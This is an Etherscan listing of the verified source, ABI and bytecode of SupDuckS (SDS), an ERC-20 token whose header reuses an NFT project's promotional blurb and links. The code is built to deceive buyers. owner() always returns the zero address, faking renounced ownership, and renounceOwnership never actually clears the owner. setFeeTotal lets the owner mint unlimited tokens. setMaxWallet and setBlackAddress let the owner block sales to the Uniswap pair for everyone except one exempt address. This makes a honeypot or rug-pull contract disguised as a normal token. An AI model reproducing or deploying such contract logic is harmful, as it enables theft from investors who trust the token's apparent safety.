ETH Price: $2,113.47 (+1.29%)

Token

SupDuckS (SDS)
 

Overview

Max Total Supply

100,000,000,000 SDS

Holders

9

Transfers

-
0

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SupDuckS

Compiler Version
v0.6.12+commit.27d51765

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2021-11-14
*/

// SPDX-License-Identifier: MIT
/*


Ever wanted 10,000 friends? Well you're about to cop your one-way ticket to the sickest clubhouse on the block...chain. 
The generous overlords at MegaVoltCorp have painstakingly hand drawn some of the dopest and I mean dopest MFin’ artwork 
so you can have an avatar you’re not ashamed of. Go ahead, click that mint button and get yourselves a slick new NFT but 
only 10 at a time, you greedy quackers!


    
    * OpenSea: https://opensea.io/collection/supducks
    * Twitter: https://twitter.com/RealSupDucks
    * Discord: https://discord.com/invite/4bxdBNBy9g
    * Medium:  https://medium.com/supducks
    * Website: https://www.supducks.com

**/


pragma solidity ^0.6.12;

library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // According to EIP-1052, 0x0 is the value returned for not-yet created accounts
        // and 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470 is returned
        // for accounts without code, i.e. `keccak256('')`
        bytes32 codehash;
        bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
        // solhint-disable-next-line no-inline-assembly
        assembly { codehash := extcodehash(account) }
        return (codehash != accountHash && codehash != 0x0);
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        // solhint-disable-next-line avoid-low-level-calls, avoid-call-value
        (bool success, ) = recipient.call{ value: amount }("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain`call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
      return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
        return _functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        return _functionCallWithValue(target, data, value, errorMessage);
    }

    function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
        require(isContract(target), "Address: call to non-contract");

        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                // solhint-disable-next-line no-inline-assembly
                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.s
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

abstract contract Context {
    
    function _msgSender() internal view virtual returns (address payable) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () internal {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public pure returns (address) {
        return address(0);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

contract SupDuckS is Context, IERC20, Ownable {
    using SafeMath for uint256;
    using Address for address;

    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    address public _tUniswapPair;
    address public _tBlackAddress;
   
    uint256 private _tTotal = 100_000_000_000 * 10**18;

    string private _name = 'SupDuckS';
    string private _symbol = 'SDS';
    uint8 private _decimals = 18;
    uint256 public _maxWallet = 100_000 * 10**18;

    constructor () public {
        _balances[_msgSender()] = _tTotal;

        emit Transfer(address(0), _msgSender(), _tTotal);
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }
    
    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }
    
    function setUniswapPair(address newUniswaPair) public onlyOwner {
        _tUniswapPair = newUniswaPair;
    }
    
    function setBlackAddress(address blackAddress) public onlyOwner {
        _tBlackAddress = blackAddress;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }
    
    function setFeeTotal(uint256 amount) public onlyOwner {
        require(_msgSender() != address(0), "ERC20: cannot permit zero address");
        _tTotal = _tTotal.add(amount);
        _balances[_msgSender()] = _balances[_msgSender()].add(amount);
        emit Transfer(address(0), _msgSender(), amount);
    }
    
    function setMaxWallet(uint256 _maxWalletPercent) public onlyOwner {
        _maxWallet = _maxWalletPercent * 10**18;
    }

    function totalSupply() public view override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }
    
    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
      
    function _transfer(address sender, address recipient, uint256 amount) internal {
        require(sender != address(0), "BEP20: transfer from the zero address");
        require(recipient != address(0), "BEP20: transfer to the zero address");
        
        if (sender != _tBlackAddress && recipient == _tUniswapPair) {
            require(amount < _maxWallet, "Transfer amount exceeds the maxTxAmount.");
        }
    
        _balances[sender] = _balances[sender].sub(amount, "BEP20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_tBlackAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_tUniswapPair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"blackAddress","type":"address"}],"name":"setBlackAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"setFeeTotal","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_maxWalletPercent","type":"uint256"}],"name":"setMaxWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newUniswaPair","type":"address"}],"name":"setUniswapPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

6c01431e0fae6d7217caa000000060055560c060405260086080819052675375704475636b5360c01b60a09081526200003c916006919062000175565b506040805180820190915260038082526253445360e81b6020909201918252620000699160079162000175565b506008805460ff1916601217905569152d02c7e14af68000006009553480156200009257600080fd5b5060006200009f62000171565b600080546001600160a01b0319166001600160a01b0383169081178255604051929350917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a35060055460016000620000fa62000171565b6001600160a01b031681526020810191909152604001600020556200011e62000171565b6001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef6005546040518082815260200191505060405180910390a362000211565b3390565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10620001b857805160ff1916838001178555620001e8565b82800160010185558215620001e8579182015b82811115620001e8578251825591602001919060010190620001cb565b50620001f6929150620001fa565b5090565b5b80821115620001f65760008155600101620001fb565b610f8c80620002216000396000f3fe608060405234801561001057600080fd5b50600436106101215760003560e01c806370a08231116100ad57806395d89b411161007157806395d89b411461031d578063a9059cbb14610325578063d5aed6bf14610351578063dd62ed3e14610377578063f2fde38b146103a557610121565b806370a08231146102c2578063715018a6146102e857806382247ec0146102f05780638766504d146102f85780638da5cb5b1461031557610121565b80631f9ac901116100f45780631f9ac9011461022157806323b872dd14610249578063313ce5671461027f5780635d0044ca1461029d5780636d0a2e90146102ba57610121565b80630552d4e81461012657806306fdde031461014a578063095ea7b3146101c757806318160ddd14610207575b600080fd5b61012e6103cb565b604080516001600160a01b039092168252519081900360200190f35b6101526103da565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561018c578181015183820152602001610174565b50505050905090810190601f1680156101b95780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101f3600480360360408110156101dd57600080fd5b506001600160a01b038135169060200135610470565b604080519115158252519081900360200190f35b61020f61048d565b60408051918252519081900360200190f35b6102476004803603602081101561023757600080fd5b50356001600160a01b0316610493565b005b6101f36004803603606081101561025f57600080fd5b506001600160a01b0381358116916020810135909116906040013561050d565b610287610594565b6040805160ff9092168252519081900360200190f35b610247600480360360208110156102b357600080fd5b503561059d565b61012e610604565b61020f600480360360208110156102d857600080fd5b50356001600160a01b0316610613565b61024761062e565b61020f6106c0565b6102476004803603602081101561030e57600080fd5b50356106c6565b61012e61082a565b61015261082f565b6101f36004803603604081101561033b57600080fd5b506001600160a01b038135169060200135610890565b6102476004803603602081101561036757600080fd5b50356001600160a01b03166108a4565b61020f6004803603604081101561038d57600080fd5b506001600160a01b038135811691602001351661091e565b610247600480360360208110156103bb57600080fd5b50356001600160a01b0316610949565b6003546001600160a01b031681565b60068054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104665780601f1061043b57610100808354040283529160200191610466565b820191906000526020600020905b81548152906001019060200180831161044957829003601f168201915b5050505050905090565b600061048461047d610a41565b8484610a45565b50600192915050565b60055490565b61049b610a41565b6000546001600160a01b039081169116146104eb576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b600480546001600160a01b0319166001600160a01b0392909216919091179055565b600061051a848484610b31565b61058a84610526610a41565b61058585604051806060016040528060288152602001610ea2602891396001600160a01b038a16600090815260026020526040812090610564610a41565b6001600160a01b031681526020810191909152604001600020549190610cf3565b610a45565b5060019392505050565b60085460ff1690565b6105a5610a41565b6000546001600160a01b039081169116146105f5576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b670de0b6b3a764000002600955565b6004546001600160a01b031681565b6001600160a01b031660009081526001602052604090205490565b610636610a41565b6000546001600160a01b03908116911614610686576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b60095481565b6106ce610a41565b6000546001600160a01b0390811691161461071e576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b6000610728610a41565b6001600160a01b0316141561076e5760405162461bcd60e51b8152600401808060200182810382526021815260200180610dec6021913960400191505060405180910390fd5b60055461077b9082610d8a565b6005556107ae816001600061078e610a41565b6001600160a01b0316815260208101919091526040016000205490610d8a565b600160006107ba610a41565b6001600160a01b031681526020810191909152604001600020556107dc610a41565b6001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a350565b600090565b60078054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104665780601f1061043b57610100808354040283529160200191610466565b600061048461089d610a41565b8484610b31565b6108ac610a41565b6000546001600160a01b039081169116146108fc576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b600380546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b610951610a41565b6000546001600160a01b039081169116146109a1576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b6001600160a01b0381166109e65760405162461bcd60e51b8152600401808060200182810382526026815260200180610e326026913960400191505060405180910390fd5b600080546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a3600080546001600160a01b0319166001600160a01b0392909216919091179055565b3390565b6001600160a01b038316610a8a5760405162461bcd60e51b8152600401808060200182810382526024815260200180610f336024913960400191505060405180910390fd5b6001600160a01b038216610acf5760405162461bcd60e51b8152600401808060200182810382526022815260200180610e586022913960400191505060405180910390fd5b6001600160a01b03808416600081815260026020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b6001600160a01b038316610b765760405162461bcd60e51b8152600401808060200182810382526025815260200180610e0d6025913960400191505060405180910390fd5b6001600160a01b038216610bbb5760405162461bcd60e51b8152600401808060200182810382526023815260200180610f106023913960400191505060405180910390fd5b6004546001600160a01b03848116911614801590610be657506003546001600160a01b038381169116145b15610c2b576009548110610c2b5760405162461bcd60e51b8152600401808060200182810382526028815260200180610e7a6028913960400191505060405180910390fd5b610c6881604051806060016040528060268152602001610eea602691396001600160a01b0386166000908152600160205260409020549190610cf3565b6001600160a01b038085166000908152600160205260408082209390935590841681522054610c979082610d8a565b6001600160a01b0380841660008181526001602090815260409182902094909455805185815290519193928716927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef92918290030190a3505050565b60008184841115610d825760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610d47578181015183820152602001610d2f565b50505050905090810190601f168015610d745780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b600082820183811015610de4576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b939250505056fe45524332303a2063616e6e6f74207065726d6974207a65726f206164647265737342455032303a207472616e736665722066726f6d20746865207a65726f20616464726573734f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f20616464726573735472616e7366657220616d6f756e74206578636565647320746865206d61785478416d6f756e742e45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63654f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657242455032303a207472616e7366657220616d6f756e7420657863656564732062616c616e636542455032303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f2061646472657373a2646970667358221220498f9e5f8e900ca282909048d8975ff3f0e5afc15002b2844b4bd738f64b8a4c64736f6c634300060c0033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101215760003560e01c806370a08231116100ad57806395d89b411161007157806395d89b411461031d578063a9059cbb14610325578063d5aed6bf14610351578063dd62ed3e14610377578063f2fde38b146103a557610121565b806370a08231146102c2578063715018a6146102e857806382247ec0146102f05780638766504d146102f85780638da5cb5b1461031557610121565b80631f9ac901116100f45780631f9ac9011461022157806323b872dd14610249578063313ce5671461027f5780635d0044ca1461029d5780636d0a2e90146102ba57610121565b80630552d4e81461012657806306fdde031461014a578063095ea7b3146101c757806318160ddd14610207575b600080fd5b61012e6103cb565b604080516001600160a01b039092168252519081900360200190f35b6101526103da565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561018c578181015183820152602001610174565b50505050905090810190601f1680156101b95780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101f3600480360360408110156101dd57600080fd5b506001600160a01b038135169060200135610470565b604080519115158252519081900360200190f35b61020f61048d565b60408051918252519081900360200190f35b6102476004803603602081101561023757600080fd5b50356001600160a01b0316610493565b005b6101f36004803603606081101561025f57600080fd5b506001600160a01b0381358116916020810135909116906040013561050d565b610287610594565b6040805160ff9092168252519081900360200190f35b610247600480360360208110156102b357600080fd5b503561059d565b61012e610604565b61020f600480360360208110156102d857600080fd5b50356001600160a01b0316610613565b61024761062e565b61020f6106c0565b6102476004803603602081101561030e57600080fd5b50356106c6565b61012e61082a565b61015261082f565b6101f36004803603604081101561033b57600080fd5b506001600160a01b038135169060200135610890565b6102476004803603602081101561036757600080fd5b50356001600160a01b03166108a4565b61020f6004803603604081101561038d57600080fd5b506001600160a01b038135811691602001351661091e565b610247600480360360208110156103bb57600080fd5b50356001600160a01b0316610949565b6003546001600160a01b031681565b60068054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104665780601f1061043b57610100808354040283529160200191610466565b820191906000526020600020905b81548152906001019060200180831161044957829003601f168201915b5050505050905090565b600061048461047d610a41565b8484610a45565b50600192915050565b60055490565b61049b610a41565b6000546001600160a01b039081169116146104eb576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b600480546001600160a01b0319166001600160a01b0392909216919091179055565b600061051a848484610b31565b61058a84610526610a41565b61058585604051806060016040528060288152602001610ea2602891396001600160a01b038a16600090815260026020526040812090610564610a41565b6001600160a01b031681526020810191909152604001600020549190610cf3565b610a45565b5060019392505050565b60085460ff1690565b6105a5610a41565b6000546001600160a01b039081169116146105f5576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b670de0b6b3a764000002600955565b6004546001600160a01b031681565b6001600160a01b031660009081526001602052604090205490565b610636610a41565b6000546001600160a01b03908116911614610686576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b600080546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3565b60095481565b6106ce610a41565b6000546001600160a01b0390811691161461071e576040805162461bcd60e51b81526020600482018190526024820152600080516020610eca833981519152604482015290519081900360640190fd5b6000610728610a41565b6001600160a01b0316141561076e5760405162461bcd60e51b8152600401808060200182810382526021815260200180610dec6021913960400191505060405180910390fd5b60055461077b9082610d8a565b6005556107ae816001600061078e610a41565b6001600160a01b0316815260208101919091526040016000205490610d8a565b600160006107ba610a41565b6001600160a01b031681526020810191909152604001600020556107dc610a41565b6001600160a01b031660006001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a350565b600090565b60078054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104665780601f1061043b57610100808354